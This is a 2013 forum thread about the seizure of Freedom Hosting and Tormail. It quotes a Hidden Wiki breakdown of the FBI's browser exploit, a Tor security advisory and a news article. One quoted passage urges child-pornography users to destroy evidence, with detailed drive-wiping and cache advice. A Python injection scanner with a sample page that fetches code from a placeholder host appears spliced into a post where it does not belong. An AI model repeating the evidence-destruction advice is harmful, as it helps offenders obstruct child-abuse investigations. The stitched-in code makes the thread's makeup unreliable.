


Tormail has been compromised !!!

chicken_hawk

AnaSCI VIP
Feb 2, 2013
As almost anyone with a Tormail account has observed, the service has been inaccessible for the last 3 days or so.

Some people commented that it appeared that Freedom Hosting was either down or under attack, as many .onion sites were also down. As it turned out, it has been reported on Reddit as well as in the Irish newspaper The Independent that the founder of Freedom Hosting has been arrested on child pornography related charges and is currently awaiting extradition to the United States.

Some of you may remember that, about a year or so ago, Anonymous was making allegations that Freedom Hosting was hosting sites that contained child pornography; it would now appear that those allegations may have had some degree of substance to them.

While the exact state of affairs is unclear, it would now seem that Tormail was, in fact, hosted by Freedom Hosting. As such, it is only prudent to assume the following:

1) Tormail will not be coming back up. Should the service, in fact, come back up, I would be extremely wary of using it.

2) You have to assume that all non-encrypted email is now in the hands of the authorities.

3) Even for those accounts for which the mail is encrypted, the authorities will likely still be conducting a relationship analysis, to see who is talking to whom and about what (as evidenced by the Subject: lines.)

Hopefully, any of you who have used Tormail also used PGP to encrypt the email contents.

Founder of the Freedom Hosting arrested, held without bail in Ireland, awaiting extradition to the USA : onions

FBI bids to extradite 'largest child-porn dealer on planet' - Independent.ie

Mirrorshades
 

chicken_hawk

AnaSCI VIP
Feb 2, 2013
The Hidden Wiki discussion page has the most comprehensive explanation of the attack that I've found. The only part I don't agree with, simply because there is no evidence, is the claim that the FH admin was identified through bitcoin cashing out. It is factually incorrect that Onion Bank was started months ago. It was started like 10 days before the bust. However, the FH admin may have been accepting private bitcoin donations, particularly from the CP site operators and users. After all, someone was paying the bills to keep the site running. It's possible that the FBI made a donation and tracked the payment, and if the FH admin didn't take proper precautions in cashing out, he was identified that way. All this will come out in the discovery during his court case.

I do agree that the compromise of Tormail accounts could be very bad for some members of our community, especially if they didn't encrypt their emails and routinely delete read emails from the server.

Here's the Hidden Wiki discussion of the attack.

1. It runs only if Javascript was enabled and affects Firefox 17 on Windows. The exploit used MFSA 2013-53, which was fixed in Firefox 17.0.7 (the version used in the latest Tor Browser Bundle), and relies on Windows libraries to execute its payload. If you were using an outdated Tor Browser on Windows and you had Javascript enabled (it is by default) then you have definitely been compromised. If you were using Tor on any other OS, had disabled Javascript, or had the latest version of the Tor Browser Bundle (Torbrowser - Help - About shows the version, which must be 17.0.7 or higher) then you are safe and your public IP has not been transmitted anywhere.

2. The exploit has only been online since after the servers came back on August 3rd, 2013. Now read on for the details...
By default, the Tor Browser comes with NoScript set to "Allow All Javascript Globally", meaning that Javascript is enabled by default. They do this to make it convenient for users which is why it's the default setting even though it's not safe.

3. If you were running an exploitable version of the Tor Browser on Windows and didn't either manually set NoScript to "Forbid Javascript Globally" or disabled Javascript entirely via the Firefox settings, then you are absolutely 100% busted. But if you had disabled Javascript like smart people kept telling you, using either of the two methods mentioned, then the code never executed and you are safe.

4. The FreedomHosting compromise consisted of a small, non-existent image <img> tag injected into all Freedom Hosting sites, and this <img> tag contained an <img onerror=""> event attribute. The fact that the image was missing meant that the "onerror" code ran and retrieved the rest of the code from another Onion site. They did it this way via a small, hidden image to avoid drawing attention to any obvious <script> tags.

5. The main payload (main exploit code) from that onion site then created an iframe and set a cookie in it (the sole purpose of which was to reliably identify your unique browser as you traveled between different compromised FH sites, to build a list of which FH sites you've been visiting) and more importantly ran some 0-day exploits using heap overflows to run any code they desired and escape the Tor sandbox.

6. The 0day exploit code executed some functions that revealed your public internet IP address, MAC address, local hostname (such as "LarrysPC") and what Freedom Hosting site you were browsing (they used a unique UDID for each compromised website) and sent it all to a clear-net IP in Washington. This is no joke. I wish I was kidding. It really did this! They transmit your unique browser ID (cookie value) over the clear internet to their public-internet server, thus giving them a physical person tied to the "random person" they've been observing browsing the different FH sites. With this connection performed, they know your public IP, they have the computer's hostname & MAC address to conclusively identify your computer, they have your unique browser ID cookie, and they have a full list of Freedom Hosting sites that have been viewed by that unique browser. They know exactly how deeply you are involved and their lists allow them to target the people that are clearly intentionally seeking out illegal content.

7. The use of 0day exploits means that the attacker had the huge resources required to find such completely new exploits, and is therefore most likely the government.

8. The fact that FreedomHosting was compromised means that the attacker either physically seized the servers and installed the code (government), or managed to exploit the webserver software (other malicious attacker). Considering recent news reports, it is clear that it was the government.

9. The fact that the clear-net IP collecting all the data is in Washington and that FreedomHosting is now down without a word suggests that the attacker was in fact the FBI.

10. The attacker now has the public IP addresses + what FreedomHosting site you were viewing of everybody that had Javascript enabled on Windows with an outdated Tor Browser Bundle. You better prepare to be raided. Destroy all the evidence now, if your freedom depends on it.

11. The cookie is called "n_serv" and can be viewed under Tor Button - Cookie Protections. By default, Tor is set to erase all non-protected cookies on browser restarts (and to make all cookies non-protected unless explicitly told by the user to protect certain cookies). This means that the "n_serv" cookie will not persist between browser restarts, unless the FBI has made part of their exploit code tell Tor Button to protect the cookie. That is very unlikely, though, as it would be difficult to do so and wouldn't do them much good, since the cookie changing its value doesn't actually harm their operation. They will still get your public IP for every unique browser ID that's being transmitted to them, so it doesn't matter to them if the cookie gets cleared and the browser ID changes. Therefore, due to the fact that the cookie clears itself on restart, the only way to know if you've been affected if you're running a vulnerable browser bundle is if your browser has been running non-stop since before FreedomHosting went down. Meaning that your browser has been running for at least 1 week, preferably 2 or more. If you've got no "n_serv" cookie in a session that has lasted that long then you conclusively know that the exploits have never successfully executed on your machine. The cookie only clears on browser restart. I've always been using NoScript in "Forbid Javascript Globally" mode, my last browser restart was over 2 weeks ago and I am 100% sure I have browsed some FH sites before they went offline and without restarting this browser and I don't have the cookie. People that have either set NoScript to globally forbid, or disabled Javascript entirely in the Firefox settings, are therefore conclusively safe. Everyone else will have been infected and can check for the existence of that cookie to verify that fact (will only be there if their browser hasn't restarted in the past few weeks). 
Note that the cookie will be created if Javascript is enabled, but the exploit that transmits your public IP to tie that cookie to your identity is a separate action and will only run on exploitable (outdated) Tor Browser Bundles on Windows. Therefore, the existence of the cookie is not enough reason to panic yet. If you're using Windows and you've got a Javascript-enabled Tor Browser that's older than 17.0.7 then your identity has absolutely been compromised.

12. Previous news reports from July 29th, 2013 show that the FBI performed a nationwide "child sex trafficking" bust, freeing 105 children and arresting 150 pimps/ring leaders (FBI — Operation Cross Country: Recovering Victims of Child Sex Trafficking).

13. Other news from July 29th, 2013 shows that the FBI is trying to extradite "the biggest child-porn facilitator on the planet" from Ireland (FBI bids to extradite 'largest child-porn dealer on planet' - Independent.ie). Seems that the FH admin was a 28 year old that was arrested in Ireland and that the javascript exploits were set up in a joint operation between the FBI and the Irish law enforcement since all collected IPs were sent to the FBI. If this is the guy, then Freedom Hosting is never coming back, and he's looking at a lot of jail time.

14. Also consider the fact that the attackers installed code that uniquely identifies each FreedomHosting site you were visiting, since FH served much more than just child porn. The FBI wouldn't want to bust down the doors of people that were looking at relatively harmless stuff from FreedomHosting. They really cared about knowing which specific sites you were viewing and took many steps to ensure that they accurately tracked which sites you visited, through the use of per-site UDIDs and a tracking cookie.

15. Timeline of events: FreedomHosting admin starts accepting BitCoins a few months ago. The FBI traces his BitCoin transactions to withdrawals into a real-world bank account via currency exchange services, thus revealing the identity of the FH admin, and an arrest is made on July 29th, 2013 in Ireland. The servers were then shut down. On August 3rd, 2013 the sites came back online with the exploit code installed.

Note by Mirrorshades: This is speculation -- I don't think that anyone except those involved really knows how the FH admin was traced.

16. It is pretty conclusive: Get a fucking move on if you were too stupid to disable Javascript, keep Tor Browser Bundle updated, were running Windows, and visited any of the FH sites after they came back online. You do not have much time. Someone in Washington, otherwise known as the FBI, now has your public IP and a list of which FH sites you were browsing. GET A FUCKING MOVE ON! NOW! Destroy everything before you end up behind bars! Remember to run multiple secure wipe-passes of your entire hard drives so that NOTHING can be recovered, and remember that encryption alone is not safe enough, data leaks out of your encrypted containers into the operating system's thumbnail caches. They might not be able to view your actual encrypted TrueCrypt images, but they sure as hell can see what kind of images you had been looking at in the past (Windows has a global thumbnail database containing smaller versions of all Thumbs.db contents from every drive on the system, Mac OS has a QuickLook cache of everything you have ever viewed, and Linux has similar leaks depending on what image viewers you were using). Also remember that they can force you to give up encryption keys (and even sentence you harshly based on suspicion if you refuse to give it out), so it's definitely not safe to keep encrypted TrueCrypt containers. Your freedom should be worth more than that. Take no chances. Perform a full 3-pass random DBAN (Darik's Boot And Nuke | Hard Drive Disk Wipe and Data Clearing) format of ALL hard disks that were used for child porn AND ALL operating system disks related to that! We are on the verge of a global law-enforcement crackdown unlike anything else ever before once the FBI uses the data they have collected, and you may only have a few days until the knock comes. 
Don't waste time with 35-pass erases, it takes days and they may knock on the door sooner than it can finish and research shows that even a single-pass erase is safe enough, but if you are truly paranoid (even though you would not gain anything from it and would only waste more time) you could do 3 random passes just to be extra safe. Good luck everyone and may God be with you. Time to brace for impact. And remember that silence does not mean that nothing is going on. People that are getting busted won't have any time to connect to Tor and let others know they've been busted. Silence does not mean that busts are not taking place. The FBI is taking this FreedomHosting compromise as the biggest victory in human history. You should treat it with equal respect and do everything in your power to stay safe. This is the calm before the storm. You will see the victims being paraded around in a giant FBI press release within a month or two.

17. For those that had blocked Javascript and are safe: It's now a good idea to remember that Tor should never be trusted, and that any content from Tor sites can be compromised at any time. Always be sure to update your media players such as VLC to the latest versions to protect against exploits in media files. There are no signs that such tampering has taken place, but this is a good time to remind people to be smart. How to be as safe as you can be: 1: Keep Tor Browser Bundle up to date every time you get an update notification. 2: Always disable Javascript. 3: Always keep all your software fully updated. 4: Run everything in a virtual machine (VirtualBox is free) to avoid data leaking out into your main OS. 5: Use Linux in that VM even if you are primarily a Windows user, because Linux is a fuckton more resilient against attacks. 6: Use encrypted containers inside the VM if your freedom depends on your data being safe from prying eyes. 7: Trust no one. Never reveal personal info on Tormail (now compromised) or even Torchat. You never want to leak anything that leads back to you. Always assume that everyone is out to get you and you will never have the issue of trusting the wrong person.

18. More warnings (TORMAIL): The hidden service for Tormail has been compromised since it ran on FreedomHosting. It's therefore very likely that all the contents of your Tormail inboxes are in their hands. Do not log into your accounts. Depending on how Tormail works, your emails might possibly have been stored in encrypted form in the database and will only be decrypted whenever you log in. In that case, they can only read them by installing a backdoor that makes unencrypted copies as soon as someone logs into their account. Logging in would thereby give them the unencrypted versions. Alternatively, if Tormail already stored everything unencrypted then they already have a complete copy of it and no logging-in-and-deleting will do any good whatsoever. Unfortunately everything points towards Tormail just using a regular IMAP mail server hosted on Freedom Hosting (because of how they allowed regular Roundcube / SquirrelMail access to your mailbox, both of which are just regular unencrypted IMAP web clients), and that would mean that all plaintext emails are already in the FBI's hands and there's nothing you can do about it. Do not log in. Logging in can only make things worse! Tormail is guaranteed to be a major part of this sting because it (along with certain private messaging systems on boards) is the most likely place where people will reveal their true identities to people they've trusted. Tormail has been compromised and all you can do now is NOT log in, and pray that everything was stored as decrypt-on-demand via custom IMAP server software (unfortunately extremely unlikely because no off-the-shelf IMAP servers offer encrypted email storage). That, and destroy all the evidence so that anyone knocking down your door will find nothing on your computers.

More information:

SUMMARY: This is a critical security announcement.

An attack that exploits a Firefox vulnerability in JavaScript [1]
has been observed in the wild. Specifically, Windows users using the
Tor Browser Bundle (which includes Firefox plus privacy patches [2])
appear to have been targeted.

This vulnerability was fixed in Firefox 17.0.7 ESR [3]. The following
versions of the Tor Browser Bundle include this fixed version:
2.3.25-10 (released June 26 2013) [4]
2.4.15-alpha-1 (released June 26 2013) [4]
2.4.15-beta-1 (released July 8 2013) [5]
3.0alpha2 (released June 30 2013) [6]

Tor Browser Bundle users should ensure they're running a recent enough
bundle version, and consider taking further security precautions as
described below.

WHO IS AFFECTED:
In principle, all users of all Tor Browser Bundles earlier than
the above versions are vulnerable. But in practice, it appears that
only Windows users with vulnerable Firefox versions were actually
exploitable by this attack.

(If you're not sure what version you have, click on "Help -> About
Torbrowser" and make sure it says Firefox 17.0.7. Here's a video: [7])

To be clear, while the Firefox vulnerability is cross-platform, the
attack code is Windows-specific. It appears that TBB users on Linux
and OS X, as well as users of LiveCD systems like Tails, were not
exploited by this attack.


https://lists.torproject.org/piperma...st/000089.html

Mirrorshades

P.S.: I should make it clear that I did not write the above posting, I merely copied and pasted it here for everyone's benefit.

Stay safe, everyone!
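The hidden-image injection and off-site iframe described in items 4 and 5 above are something a site operator can check their own served pages for. The scanner below is an added example, not code from this thread or from any project it mentions; the page host, the `loadFrom` handler name and the hostnames in the sample HTML are constructed placeholders.

```python
"""Scan HTML for the injection pattern the thread describes: a hidden or
missing <img> whose onerror handler pulls code from another host, and an
off-site <iframe>. Added example for defenders; not the original payload."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hostnames referenced inside an inline handler (onion or clear-net).
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden")


def _is_tiny(attrs):
    """True when width or height is 1px or less (tracking-pixel size)."""
    for key in ("width", "height"):
        val = attrs.get(key, "").strip().lower().removesuffix("px")
        if val.isdigit() and int(val) <= 1:
            return True
    return False


class InjectionScanner(HTMLParser):
    """Collects findings for <img onerror> and off-site <iframe> elements."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Normalise attribute names; a bare attribute has value None.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "img" and "onerror" in a:
            hosts = {h.lower() for h in HOST_RE.findall(a["onerror"])}
            foreign = sorted(h for h in hosts if h != self.page_host)
            style = a.get("style", "").lower()
            hidden = _is_tiny(a) or bool(HIDDEN_STYLE_RE.search(style))
            self.findings.append({
                "kind": "img-onerror",
                "src": a.get("src", ""),
                "hidden": hidden,
                "foreign_hosts": foreign,
                # A hidden image whose handler fetches code from elsewhere is
                # the pattern from the thread; any <img onerror> merits a look.
                "severity": "high" if (hidden or foreign) else "medium",
            })
        elif tag == "iframe":
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and host != self.page_host:
                self.findings.append({
                    "kind": "iframe-offsite",
                    "src": a.get("src", ""),
                    "host": host,
                    "severity": "high",
                })


def scan_html(html, page_host):
    """Return the list of findings for one page served from page_host."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (hostnames and loadFrom are placeholders).
CLEAN_PAGE = """<html><body><h1>Board index</h1>
<img src="/images/logo.png" width="120" height="40" alt="logo">
</body></html>"""

INJECTED_PAGE = """<html><body><h1>Board index</h1>
<img src="/images/logo.png" width="120" height="40" alt="logo">
<img src="/missing-pixel.gif" width="1" height="1"
     onerror="loadFrom('http://loader-host.example.onion/x')">
<iframe src="http://collector.example.invalid/frame" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        found = scan_html(page, "board.example.onion")
        for f in found or [{"kind": "no findings"}]:
            print(f"{name}: {f}")
```

Run it against a page dump or a crawl of your own hidden service; a finding is a prompt to diff the served HTML against what you deployed, not proof of compromise on its own.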
 

swolesearcher

AnaSCI VET
May 31, 2013
Holy shit! I'm having these issues. I haven't been able to log in to my Tormail in a week or more.. shit
 

AnaSCI

ADMINISTRATOR
Sep 17, 2003
An in-depth guide to Freedom Hosting, the engine of the Dark Net

Eric Eoin Marques, 28—the “largest facilitator of child porn on the planet,” according to the FBI—was recently arrested and is currently in an Irish jail awaiting the conclusion of his extradition trial. The FBI aims to bring Marques to trial in the United States. If convicted, Marques faces up to 30 years in prison.

Although the anonymous nature of Tor makes confirming identities difficult, all signs point to Marques being one of the most important men on the Dark Net: He’s allegedly the founder of Freedom Hosting, Tor’s most popular hosting service since it was created in 2008.

Freedom Hosting maintains servers for some of Tor’s most infamous websites, including TorMail, long considered the most secure anonymous email operation online; major hacking and fraud forums such as HackBB; large money laundering operations; the Hidden Wiki, which, until recently, was the de facto encyclopedia of the Dark Net; and virtually all of the most popular child pornography websites on the planet, the charge that has landed Marques in custody. Famous child pornography websites such as Lolita City, the Love Zone, and PedoEmpire were customers of Freedom Hosting.

While Marques’s Dark Net identity has not yet been confirmed by authorities, the FBI’s description of "largest facilitator of child porn on the planet” applies to the founder of Freedom Hosting more than anyone.

An Eric Marques runs an Irish hosting company called Host Ultra Limited, according to a SoloCheck.ie company report. He also owns an account on the webhostingtalk.com forum, where he made 785 posts, first discovered by gray hat hacker SHG.Nackt. On that forum, Marques promoted his business and solicited advice about anonymizing tools such as virtual private networks.

“The charges [against Marques] relate to images on a large number of websites described as being extremely violent, graphic and depicting the rape and torture of pre-pubescent children,” reported The Independent.

Every Freedom Hosting website went down simultaneously at around 6:40am ET on Saturday morning, about the same time news of Marques’s arrest hit the Internet. If and when the websites have returned since the downtime, many have been infected with Javascript exploits that may be able to identify visitors by grabbing a user’s cookies, logins, and IP address to send “home”—which, in this case, is the Verizon-owned IP address 65.222.202.53. The previously unknown exploit only affects Firefox version 17, which is exactly the version Tor uses.

Freedom Hosting’s famously laissez faire terms of use stated that it does not give customers permission to upload any illegal files—but “if you chose to do so anyway, we are not responsible for your actions.” This was widely seen as winking permission to use the hosting without regard for the law of any land.

A Freedom Hosting account cost a one time fee of $5 or was free with an invite from an existing member. It offered unlimited space and bandwidth, an onion domain (“xxx.onion”), “Fast Network with 24/7 Uptime,” PHP and MySQL support with unlimited MYSQL databases, “No javascript or cookies required to login, Upload a zip with your files and extract on server, FTP Access, and Daily Snapshot Backups—Kept for 1 month.”

For five years, both law enforcement and hacktivist vigilantes seemed incapable of shutting down the largest child pornography services on the Internet—virtually all of which were Freedom Hosting customers—thanks to the technology provided by Tor. Today, all of the major websites hosted by Freedom Hosting are down or are suspected of having been infected with malicious code. No one is sure how Marques was tracked down.

An administrator of the famous 4Pedo forum noticed “unknown Javascript” on his own website on Saturday.

“Unknown Javascript in the board pages pointing to iframe to a Verizon server on the open web!” wrote 4Pedo’s owner. “They are inserted by Freedom Hosting! I would consider Freedom Hosting compromised! They are also in other TLZ and other site pages! Stay away from all Freedom Hosting sites including TLZ [The Love Zone], LC [Lolita City], TorMail, all of these are hosting on Freedom Hosting! All boards have been deleted to protect you! If the boards come back up, it is not me running the site anymore! All admin/mod accounts have been deleted!”

The Javascript exploits now widely assumed to have originated from the FBI or Verizon have been posted publicly around the Web.



Freedom Hosting first gained mainstream attention in 2011 when Anonymous attempted to shut down the service and the child pornography websites it hosted using Distributed Denial of Service attacks in an offensive called Operation Darknet.

The story was a big public relations win for Anonymous, usually an extremely polarizing entity.

"It was the right thing to do. Period," wrote Ars Technica commenter Reflex-croft. "Too bad they can't focus all their efforts on stuff like this, it would be nice to be able to rally behind them unequivocally."

"kudos!... this is where you should be doing!" wrote astut945. "shutdown those child porn sites!"

The most popular child pornography website attacked, Lolita City, hosted 100 gigabytes of photos and video during the 2011 offensive.

The sites involved were disabled. IP logs were released and mapped. This proved that the websites were not invulnerable. Anonymous took a victory lap.

Anywhere from a few minutes to a little over a day later, the attacks ceased and the war was over. All the sites were restored.

By June 2013, Lolita City boasted 14,969 members and growing, 10 times its membership during Operation Darknet. The 100 gigabyte figure was shocking in 2011. By 2013, the website hosted over one million pictures and thousands of videos. The Anonymous offensive had actually provided major publicity for the child pornography sites and their patron, Freedom Hosting.

Operation Darknet involved some of Anonymous’s most notable members. Sabu (Hector Xavier Monsegur), the Bronx-based hacker, LulzSec founder and FBI informant was one of the principal organizers of Operation Darknet, leading many to wonder to what extent the FBI had knowledge of those Dark Net raids. Sabu became an FBI informant in August 2011 after pleading guilty to a dozen criminal counts, reported the New York Times. Operation Darknet was executed in October 2011.

The Real Sabu @anonymouSabu

#opDarkNet will be releasing logs of actual pedophiles utilizing Lolita City's services. 190 IPs from actual users of the site. And IP map.
11:37 PM - 1 Nov 2011

At the very least, the FBI was fully aware of the raids into the Dark Net and allowed them to proceed. The question is, who was directing the operation if Sabu was, at that point, a puppet doing the FBI’s bidding?



Before Operation Darknet, Freedom Hosting offered hosting to the public for a small price. After the Anonymous attacks, Freedom Hosting became a private, invite-only service for a full two-year period in order to protect itself. To become a Freedom Hosting customer, you had to be invited by someone who was already a customer.

This process is not as difficult as it sounds. Invites were handed out to anyone who so much as earned the respect of another customer. In fact, I earned a personal invite to Freedom Hosting earlier this year after one customer enjoyed the articles I’d written about the Dark Net. I politely declined the offer.

That said, Freedom Hosting invites have been highly prized for the full two years they’ve existed. Invites were common topics of conversations on every popular onion forum. Many members asked or even begged for invites while others offered money.

Last month, after two years, Freedom Hosting changed its policy drastically. The service’s founder said he’d always wanted to bring the service public once again but that he didn’t have an ecommerce platform secure enough to operate the risky business.

“I created Onion Bank,” announced the founder last month, “which has been in (slow) development for almost two years!”

The bank offered all the services of a normal bank plus escrow, merchant services, money laundering, and above all, the bank would handle everything anonymously. On the back of this Bank, Freedom Hosting went public once again, offering anonymous onion hosting to whomever could pay for it. The bank caught the attention of many prominent Dark Net businesses, but it’s impossible to say how widely it was adopted in its month of existence.

Freedom Hosting’s trademark promise was that it would never look in on websites under its care. Over several years, only a handful of public complaints were made that a Freedom Hosting administrator did look in but most forgave the eyeballing as necessary maintenance.

Freedom Hosting remained the most trusted and popular hidden service hosting business until yesterday’s seismic events.

There is no word on how the police identified and then apprehended Marques. Worried Tor users immediately wondered if the famously tough-to-crack technology had finally been solved by law enforcement. However, the fact that Freedom Hosting websites have been injected with malicious code suggests that law enforcement still cannot crack Tor outright and that they need to rely on other methods.

One possibility is that Marques was caught through social engineering techniques. Multiple anonymous sources say that, likely because they lack the capability to launch an effective technical offensive against Tor-protected targets, law enforcement has been on a steady social offensive against websites such as Freedom Hosting and the famous Tor black market Silk Road. There have been multiple unconfirmed reports—after all, almost any report from the Dark Net is unconfirmed—that important members of the Silk Road community have been contacted by law enforcement this year in an effort to find helpful intelligence and, ultimately, take down Silk Road and its founder, Dread Pirate Roberts.

After such a monumental bust on the Dark Net, the natural follow-up question has been asked and asked again: Is Silk Road next?



For running what may be a $45 million dollar per year black market, Dread Pirate Roberts can be considered in something of a tie with Freedom Hosting’s founder for the title of most wanted man on the Dark Net. While Freedom Hosting places no limit on what its customers can do, Roberts explicitly forbids the trading of child pornography on Silk Road, among other verboten items.

It’s not known how much progress law enforcement has made in their fight against Silk Road, which is self-hosted, a move made possible and necessary by the millions of dollars moving through the market. When contacted by journalists, various American law enforcement agencies have acknowledged that they are aware of Silk Road but have let on little else. It's commonly accepted that police are closely monitoring the black market and its forums.

On the Tor Talk email list, members have noted a “very large drop in the number of onions,” which is what Tor websites are called due to the multiple layers of protection they provide. Some are estimating that half of all onion sites were hosted on Freedom Hosting. This event could add up to thousands of total hidden services lost.